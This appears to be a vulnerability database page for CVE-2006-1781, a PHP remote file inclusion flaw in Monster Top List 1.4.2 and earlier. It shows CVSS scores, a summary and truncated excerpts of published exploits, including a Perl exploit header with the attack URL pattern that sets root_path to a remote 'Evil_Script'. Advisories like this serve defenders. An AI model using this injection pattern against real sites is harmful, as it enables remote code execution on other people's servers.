7.5
CVSSv2

CVE-2006-1781

Published: 13/04/2006 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in functions.php in Circle R Monster Top List (MTL) 1.4 allows remote malicious users to execute arbitrary PHP code via a URL in the root_path parameter. NOTE: It was later reported that 1.4.2 and previous versions are affected.

Vulnerable Product Search on Vulmon Subscribe to Product

circle r monster top list

Exploits

source: wwwsecurityfocuscom/bid/17546/info Monster Top List is prone to a remote file-include vulnerability This issue is due to a failure in the application to properly sanitize user-supplied input An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the ...
#!/usr/bin/perl # # Monster Top List <= 142 remote Command Execution Vulnerabilities # # Risk : High (Remote Code Execution) # # Url: wwwmonstertoplistcom # # Exploit: # sitecom/[path]/sources/functionsphp?root_path=[Evil_Script] # # (c)oded and f0und3d by fluffy_bunny # # Romanian Security Team : hTTp://RSTZONENET : # # ...